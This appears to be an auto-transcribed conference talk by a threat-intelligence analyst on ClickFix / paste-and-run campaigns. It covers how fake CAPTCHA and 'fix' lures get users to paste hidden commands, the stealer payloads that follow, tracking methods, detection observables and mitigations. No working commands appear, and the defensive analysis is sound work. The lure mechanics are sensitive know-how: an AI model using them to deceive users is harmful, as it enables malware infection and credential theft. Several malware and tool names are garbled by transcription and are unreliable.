Copy That: Tracking and clustering ClickFix campaigns

Hey y'all. All right, it's going to take me some time to get the mic dialed in. Is that a good Is this a good distance from the face? Yay. All right, thank you guys in the back. I appreciate it. So, I hope everybody's having a good day so far. Do we have a good morning? Yeah. Yay. Good. I'm delighted to be here with you today. Welcome to copy that tracking and clustering clickfix campaigns. So I already had a wonderful intro from Patrick. I'll share a couple more little details. So I am a senior intel analyst at Red Canary. Been there for a little over three years about three and a half. Uh yes, before that I was a DFIR

consultant at the Indian which was great fun. Before that I was here I was uh at the school of computer and cyber sciences class of 2019. Go Jacks. So, for those of y'all who are also in the SECS, I hope you're enjoying it as much as I did. It's a fantastic program. Um, and Bides was actually my first conference. So, when I was still in school here, I volunteered. And I know I'm seeing the screen do that, too. So, let's see if we can figure out wiggle it a little bit. There we go. Nope. Still, it looks We'll see if it gets to be too ownorous. We'll see if we can find another way to like make the

computers work well together. And current favorite hobby, jigsaw puzzles. I find them very relaxing. It's another way of kind of using my brain but also turning my brain off. So, let's get into it. All right. So, today we're going to talk about paste and run. Going to start off talking a little bit about what that is. Then I'm going to share the struggle of some of the things that the Intel team had to think about as we were trying to cluster and track it over the past year. I'll share some lessons learned and some detection opportunities and then we will wrap up and I'll answer questions. All right. So what is paste and run? Paste and run. Base explanation is it's

an initial access technique that tricks users into copying, pasting, and executing malicious PowerShell code. Who here has heard of paste and run or click fix or fake capture in the last year? Oh wow. Okay, it we're all enjoying the past year and a half, aren't we? That's a lot more than I thought there would be. And so, as yall know, like we said, there are these different names. The names reflect the two kinds of lures that paste and run uses. So the reason why we use paste and run at Red Canary is early on we started seeing the fake capture lure as it was moving away from the fix and we started calling it this

because it was kind of lure agnostic. So if you've ever wondered why we're sticking to paste and run that's why but it's the same thing. All right. So, there are Thank you all for troubles with shooting connections and things. Nope. Still doing um that's all right. I think it's a little better. Anyway, so there are two main kinds of lures. So, the user has to fix their access to a document or website access or um do a software installation and they fix things by following the instructions in the prompt. The second kind of lure is a ious style lure. Again, the user has to access a website or a download. And they do that by proving they're a human by

following the instructions in the prompt. So, here's an example of kind of one of the OG clear fake click fix lures. So, can anybody tell me, and this is for a giveaway, this is for the wide range wireless USBC adapter. Can anybody tell me what month and year Proof Point first reported this being used by TA 571 and by Clear Fake? Yes, green shirt. >> Yours. Well done. So, yes, in March 2024, Proof Point reported that this was being used by again TA 571 and by Clear Fake to pretty good effect. So, As you can see the the prompt is that oh we have a trouble we have issue you need to copy this open PowerShell admin within you

know right click in the terminal window and then refresh the page after the update is complete. This was very effective. This was so effective that there started to be some variations on the theme. And this is actually the kind of lure that has really taken off. So this fake captious style lure, wildly popular, wildly successful. And this is one that I pulled from um clickfixcarsonw.com, which is a great resource for kind of domains and checking out what the lures look like. A lot of them are mimicking Cloudflare verification pages. And the idea is that you click to verify that you're human. That's the first step in this malicious process. And then you follow the prompts. You press some keys.

So what's actually happening as you are doing those things? So first of all, the user interacts with the lore. That's that click to verify that you're human. What that does is it copies an obiscated PowerShell command to the user's clipboard without the user knowing. most of the time. Sometimes it's more overt like it was in the clickfix lures. I've also seen paste and run use fake capture lures that just say copy this command. Um but usually the user doesn't know. Then for the Windows version, particularly the fake capture version, the user's prompted to press the Windows button and R. And what that does, some of them use Windows and X as well. Both of those are shortcuts to

open up the Windows run dialogue. The next step is to controlV is to paste. That pastes the previously unknowingly copied command into the Windows run dialogue. You press enter that executes the command. The command reaches out to the next stage. Paste and run has successfully done its shenanigans. So, this hasn't done anything evil yet, but this is an initial execution technique, right? This is what they're using to set up their their next stages or their next uh actions in their uh behavioral activity chain. So, what happens next? Here's an example of what the run dialogue command looks like. So, this is the kind of thing that gets copied to the clipboard. Um, and sometimes it'll be this overt

that it is a fake capture style. Sometimes it's a little more subtle. Um, but there'll be some kind of command copied into the uh run dialogue window again for the fake capture version. This example specifically uses MSHTA to pull down the resource in the command that goes on to execute a PowerShell command that's obiscated. So the example I'm going to show you used B 64 and concatenation. It looks like this. And then After that, the script pulls down the next stage payload. No, no, no. I thank you for troubleshooting. I appreciate it. Did that do it? >> Nothing happened. Everything Nothing. It's all the same. Nothing changed. So, um, the script pulls down the net

stage payload. And in this example, the payload would have been ratanthis. So for a and this is very apt an evading edr book. Who can tell me what kind of malware family Ratamanthis would fall into? Yes. Yes. It's okay if it's on the screen. I'm not mad about it if y'all are reading ahead of me. All right. So um radamis yes is an information stealer and stealers are very popular choices of malware for these followon payloads I think stealers and remote access tools and then also additional downloaders. So like a hijack loader ghost pulse is another really common follow-on payload because it gives them a lot of options for what they can do with the access that they

have. Like any successful technique, the scope of uh targeted systems has expanded since it first appeared on the scene. This is the Linux variant. So you uh receive the prompt usually in a browser window to again prove that you're not a rebot. And you have to verify you're human by pressing Alt F2, Ctrl +V, and enter. And for our last giveaway for a practical Linux forensics book, who can tell me just kind of base terms, what does Alt F2 do on a Linux system? Yes, it does. It opens up the run command. Thank you. Congratulations. All right. Oh, I left my pointer over here. Okay, so that is the Linux variant. This is also effective.

And there's a Mac OS variant. Uh we have not seen the Linux variant at Red Canary. We have seen the Mac OS variant used to great success to deliver Atomic Stealer and other Steelers in the Amos family. So like Poseidon, Odyssey, so forth. Um and this looks a little more involved, but y'all that are Mac users, you know this looks like a homebrew command, right? So if you're doing installations at all, you see this, it's going to be like, "Oh yeah, okay. We're going to do the installation for this this thing in homebrew. More like homebrew instead of a click to download. This is fine. Everything's fine. Works a treat. There have also been expansions on the

kinds of places or the places on the systems where this technique or similar social engineering can be used. There's a variant called file fix and that has the user run the command in the Windows file explorer. Um, so as you can see it's they're prompted to copy a file path and that is actually what pulls down the script or the payload. Again, very effective. This is actually a really popular variant that's in use by Kong Tuki, which is a uh malicious traffic distribution system. They've been using this variant of the technique quite a bit this year. How is it distributed? It's distributed any way you can distribute fishing emails. I think this is one of the reasons why

it's so effective. It's because users are kind of bombarded on all sides by uh different places that they're encountering the lures. So fishing emails like I said, malvertising, website injects, malicious links like uh shared in Discord I know is one vector that was used and lots more. I wanted to include some additional examples of what this can look like. So this is what one of the fishes might look like. Um, you click in to review feedback after a recent Booking.com stay and then it has you verify that you are a person after you follow the link in the fishing email. Why is this so effective? Why? It's because it takes advantage of human factors, right? So, as Patrick

mentioned, I have an MS in psych. I like thinking about the human factor side of things. The biggest reason why this is effective is that captures are not perceived as a threat, right? Captures are a thing that we have been kind of trained to do. We're habituated to them. I'm not going to say users because we are also habituated to them. And completing them is routine. And the fact that completing them is routine is really what makes this so effective. Because when humans have routine tasks, we don't think as hard about completing them. We do them more automatically. We don't look at them as critically. And that means in some cases we're more likely to just

kind of follow along with behavior that we're used to doing. Uh also there's some urgency to fix the issues that you're having to complete your work and also people tend to follow instructions from trusted sources. These are designed to mimic uh Cloudflare verification or you know Windows popups and to an average user it's going to look like something that they should follow along with. I saw this one last night. So, this is I know it's like a potato fuzzy copy, but this is a browser popup mimicking Windows update screen that uses paste and run to get them to complete the security update. This is sinister. I can think of a lot of people who wouldn't think too hard about this. Um,

it's the worst. So, sharing the struggle. So, I wanted to talk a little bit about thinking about this from a threat intelligence perspective because that's one of the fun things about the work that we do is people that work in on different teams look at threats in different ways. And this was really interesting to try and figure out how to track from an endpoint perspective. And there's different ways that you can think about it, right? There's different boxes that you can put this behavior into. And so, I'm going to talk a little bit about each of these in some more detail. The first one is groups and adversaries, right? You can track who is using paste

and run in their campaigns. And initially, especially early on, that's what we were doing because this was reported by proof point as being used by a very specific couple of adversaries by TA571 and by Clear Fake. So, we started tracking it that way. At first, the technique was really rapidly adopted by a very wide number of adversaries. So, that wasn't going to work in the long term. And for those of youall who don't know as much about Red Canary, we are an MDR, managed detection and response, endpoint detection and response team. So, we have expanded a little bit into some fishing offerings and identity, but we're really endpoint people. So for us, we would really have to lean on Osent to

be able to make these associations because we just don't have visibility. We see what happens on the endpoints. And that's why it's great that teams like Proof Point share their research because they do have better visibility into the campaigns. We can track the infrastructure. So we can track where the lures and the payloads are hosted. And this is nice because it's a little more adversary agnostic. doesn't matter as much who's adopted the technique. And we can also use concrete IoC's. We've got IP addresses. We've got domains. But again, from an endpoint perspective, this can change very quickly. All they've got to do is put a new IP address or a new domain in the script or in the command

and poof, there goes our cluster. So these kinds of clusters might last for a week, a day depending upon the campaign that's being operated. So for our purposes, they're a little brittle. We can track the payloads and follow on threats. And from an endpoint perspective, this is great. We do this. We can determine this much more easily from where we sit. We see the activity on the systems. We can put stuff into a sandbox. We can actually figure out what malware is executing. And it's much less dependent on OSENT for us. However, there are so many payloads. So many payloads. At this point, we've easily seen two dozen different threats delivered or using paste and run. That's

a lot. That's a lot to keep track of. What do we do with it if the payloads are undetermined? What if the payloads aren't delivered? We track it as precursor activity in that case, but still this is also not ideal. And then red canary clusters. So we can look at what we're seeing. We can combine IoC's and behavior. We can create our clusters. And this is great because we can track it based on what we see. We can be super accurate and we can discover new uses and unique malware. So our cluster uh that became Mocha Mannequin kind of came out of this initiative and uh they used a custommade tool called node initrat. And so we were

able to figure that out with our clusters. However, as I have mentioned, this changes really rapidly. So, you start getting into like infinite clusters of of potential activity depending upon how you want to categorize it. So, how did we actually track this activity at Red Canary? All the things. We did all of the above and a little more. So, especially at first, we were associating to adversaries and groups and we still do. Like I said, uh we've been tracking Kong Tuki using FalFix. And so when it's available via OSENT or we can kind of hunt up that association, then we definitely do track it that way. We track the infrastructure and the domains and IPs. We track the payloads

it's dropping. We have our internal clusters. And then the the thing that we started doing once we realized we had all of these really sort of disperate and different kinds of tracking methodologies is we created an internal tag in synapse for the technique. So synapse it's vertex synapse is a tool that uh you can use as a thread intelligence analyst to kind of cluster organize look at your data. If you're familiar with Nucleus, this is the commercial version of Nucleus. And so we started doing that, which was very helpful. Tracking it in all of these different ways means, like I said, it's well tracked. It's very accurately tracked. It's really hard to aggregate, right? It's it's doable. We have done it, but

it's harder to do across time. And we're a small team. There's eight people on the Red Canary Intel team. So anything that saves us time is a good thing.

So earlier this year the MITER team created a new sub technique for user execution malicious copy and paste which is very exciting. This is paste and run. So uh we have a lot of tools our platform we have a lot of attack technique integrations. When this came out, I was like, because I'm like Marie Condo, it sparks joy for me to organize information into very easy to look at ways. So, I was like, this is a great opportunity to go back and take a look at everything that we've seen. I did that and I won't go into too much detail about how we did this in synapse but again it we created a tag to kind of

supplant or go along with our internal tag. We added some additional vertex connections between the different data points and that makes it easier to find things easier to pivot easier monitor trends over time which is what we want to do as intel analysts. All right. So, now I'm going to get into some lessons learned and I'm gonna share some findings and some detection opportunities. This is what it looked like before. These are actual charts I pulled out of synapse. Um, some of them like one of them is our internal tag. One of them is like payloads, clusters, we had command lines and afterwards we had one data set, one beautiful data set. When you have one

beautiful data set that's easy to query, you can ask and answer questions so much more easily. I know that you all already know this, but it just it's so satisfying to be able to take all of the data and make it useful. That's kind of what we're trying to do as Intel analysts. So like I said, we can easily answer questions like what threats have we seen with paste and run across time? And the top five paste and run payloads that we've seen across time are Lumacy 2 which is a stealer, net support manager which is a remote access tool, hijack loader which is a dropper and downloader that can pull down more payloads. Latectus another stealer and Ratamanthis

another sealer. So again, scalers are very popular payload choices. I wanted to also include some information that was a little bit more current like uh post Lumis C2 takedown. If y'all will recall, there was a major infrastructure takedown earlier this year in May to remove Lumis C2 infrastructure. It has returned since then. So even in the last three months, it was still the second most commonly seen threat alongside and run. Um, and again, it's very similar, just things in slightly different order, but it's so nice to just be able to go in and answer this question in mere moments compared to what we could do before. And this is another really fun one, looking at how the execution has changed

over time. This is a little in the weedsy, so I won't go into deep deep details about this. I will say a couple of things I want to point out are um it pyon very commonly uses mista and it uses powershell with invoke expression in the scripts quite often I'll actually circle back to that in a little bit and they moved away from it this summer they were using some different types of execution they've returned to it now they're also using MSI exec so we're starting to see that more and more in the last month and a half or so. And we're also starting to see these PowerShell commands that use the net class system net web request with get

response included as well, which is kind of interesting. So, lessons learned. I think for us, the biggest lesson is we'll lean harder into those internal technique tags even sooner. We did do that, but it would not have hurt anything if we had just done that up front, been like, "This is a technique. We're starting to see it in multiple environments. Let's make sure that we are organizing it in a way that makes it easy to see across environments and across time because then if the good folks at MITER do create a technique for official create a technique for that TTP then we will already have everything aggregated and we can just put their tag on top of our tag. So, I think this is

something that we're going to start doing a lot more aggressively is just going ahead and being like, "Okay, we're gonna call it this just so we can see all of it all at once." Here are some observables for those of y'all who are inpoint and detection minded. You're going to see explorer spawning processes to execute that initial command. It might be Misha, like I said, it might be MSI Exec. It might be PowerShell, but you're going to see or cmd.exe as well, but you're going to see something spawning and reaching out to those remote resources, which means you're also going to see suspicious outbound network connections. Not just early on, you'll see this early on, but you'll also see

this all the way through paste and run execution as different stages get download and then reach back out for C2 or to pull down additional resources. And this is another one that I want to point out. You're going to get a registry registry key change unless the prompt uses Windows and X. Windows and X does not create a run MRU registry key for Windows run dialogue use, but that's less common than the Windows and R. So if you are seeing especially these things together, this is sus. This is very suspicious. Um, this is suspicious enough that especially for us, these are kind of the hallmarks of what we look for for early paste and run execution.

detection opportunities. So as I mentioned PowerShell using invoke expression to download additional content. This has been a great way of detecting paste and run from the beginning. And this is still very effective. And so um this only also not only works for paste and run as well. This is useful for other adversaries that like to use PowerShell scripting to pull down additional resources. And uh as you've seen a couple of times, Misha reaching out and making external network connections generally it ought not to do that. And so this is a good thing to kind of baseline in your environment if you do see it doing this. It's worth taking a closer look at. I want to offer a couple of mitigation

suggestions as well. So user education, I know that that's a little tricky because User education is something that we all know is always, you know, it's iterative. It's a process, but making sure that users know that there should never be a reason for them to be pressing keys as a part of a verification process. Um, that that's just that's not okay. That captions, legit captions, will never have you doing keyboard actions as far as I know. If I'm wrong about that, please feel free to correct me, but I've never seen a legit capture that uses any kind of keyboard actions at all. Uh, you can disallow access to the Windows run dialogue or you could disable Windows

hotkeys. I know depending upon your users and your environment, that might be a little tricky because some people really love to use these things, but something to consider. This last one's a little spicier. You could disable cmd.exe exe and PowerShell execution for standard users. I know that might be a lot and it might be hard to implement, but it's something to think about. If this is the kind of thing you're able to do with group policies, then the bad things don't run, which is really nice. Um, so again, I I'd like to just throw this out there as this would mitigate it and a lot of other things. Something to think about. So, what are your key takeaways? What

have we talked about today? So, we've talked about paste and run aka clickfix fake capture and how it's a very popular and effective initial access technique that is in use right now. There are varieties of different ways to track this activity from an intel perspective which made it a little challenging to decide how to track it early on. But we were able to leverage different technique tags to be able to kind of aggregate that data set and gain more insights from our data more easily. And then I shared some findings and detection opportunities based on what we've seen at Red Canary. And that is all of the content that I have for you today. And now I would be

very happy to answer any questions that y'all have. All right, I'm gonna start here and then work my way up. >> So, the question is, what about blocking clipboard access? I think that would work. I'm I'm not as familiar with the kinds of policies that you'd have to use and how that might affect different user experiences. But I if you're able to I don't see any reason why that wouldn't potentially be helpful because it is that that specific control and V. Um there might be other ways that they could still copy and paste things that wouldn't be affected.

>> Yes. Yeah. So the comment is that the actual evil the shenanigans are happening when they pull it in. So if you can keep it off the clipboard, it won't get pulled in and executed. Um, so yeah, that could work. >> All right.

>> Oh, interesting. So the question is um can we use additional software uh like DBS software to keep see what's copied into things? We have not, but that's partly because of where we sit at Red Canary, right? So where we sit on the endpoint is we sit kind of on the other side of like Microsoft Sentinel one and we see what's happening on the systems. But from an enterprise perspective, I do feel like that's something that you could use in your local environments to take a look at things when you're doing investigations. And we we can like go into sensors, our thr hunters can do things like that, but because of the scale, we tend not to do that. If we can

detect it behaviorally, that's much faster for us to do at scale. Yes. All right.

>> All right. So the question is um this gentleman they do disable PowerShell in Neil's environments for standard users but have we seen any other kind of additional execution like visual basic script and things like that is what not as often I don't think we've seen this technique use VBS files but I feel like adversaries love to cycle between scripts right so if something works really well as PowerShell it's not at all uncommon for now they're using MSI. It would not surprise me if we start seeing more JavaScript or more VBS as people get better at defending against the PowerShell execution because they just they love to iterate through the scripts. Yes.

Mhm.

>> this kind of activity. So the question is what false positives have we seen behaviorally? uh since we do a lot of behavioral detections um and for this activity not a lot not a lot um especially if you get beyond that first execution again like I said for things like MISTA to reach out and pull down resources that's very telling um and so especially because now we have behavioral detection opportunities for that initial execution um we haven't had a lot of false positives um which is one of the nice things about it. I guess it is it's high volume. Um it's not especially quiet and if you're looking for some of the things that I've

mentioned hopefully it will be a little loud which is always nice. Any other questions? Oh yes. There's no such thing.

That's a great question. It's not a stupid question. So, the question is, uh, at Red Canary, since we do this kind of work, would we be producers or consumers of threat intelligence? The answer is both because like a lot of threat intelligence teams, we have a lot of different customers, so to speak. We have our customers who we're working for, who we're producing intelligence for, but we also have our internal teams that are leveraging the things that we find and feeding it back into our detection engine and are using the things that we find to kind of make our work at Red Canary better. And we also read everybody else's reports too. Like I said, proof point, you know, we can as

much oent as we can read about these things, we try to take a look at I have the next slide is all my references. So yes, I absolutely consume a fair bit of intelligence as part of my work as an analyst. I saw another hand. Yes.

>> Uhhuh.

So the question is with Windows and R and the Windows run dialogue pops up, how do the users not like see that pop up? I think what usually happens is it's behind the browser screen or whatever it is that they're interacting with. And so I think that instead of it popping up and then like seeing it and seeing that happen, I think that they're keeping it like visually not at the front of the the series of windows. Um so yeah, I don't think they see it when it's happening. >> Yes.

Uhhuh.

>> Oh, okay. >> Oh. Oh, that's terrible. >> Okay, I appreciate that. Thank you. Because that's the kind of thing that we don't see as well from where we sit. So, um, they've actually seen this executed on systems and what they have seen is that the Windows run dialogue actually does pop up and is visible to the users, but part of the string is the I verify that I'm human. So they see that they're like, "Oh, good. I'm doing the thing I'm supposed to be doing. I'm verifying that I'm human." And the additional code that's pulling down remote resources is not visible to them in the run dialogue window. So they do see it happening, at

least in some cases, but it looks like they're doing what they're supposed to do because they're doing what the prompt told them. Gosh, clever. Clever girl. It's terrible. Any other questions or insights about some of y'all? Because like I said, I was How many of youall have seen this activity or have heard about it? Yes.

Okay.

>> Oh, yeah.

>> Okay. All right. >> Okay. So uh this uh this gentleman was saying that at their environment they had somebody who it sounds like maybe there's some social engineering that happened with the prompts and uh VBS uh files were leveraged for the evil that was done and adversaries do. They love all of the scripting languages or the different scripting options so much and they love to kind of rotate between their current favorites. Thank you for sharing. Anybody else? It's been An absolute pleasure. Thank you all so much. I hope you have a wonderful rest of your day.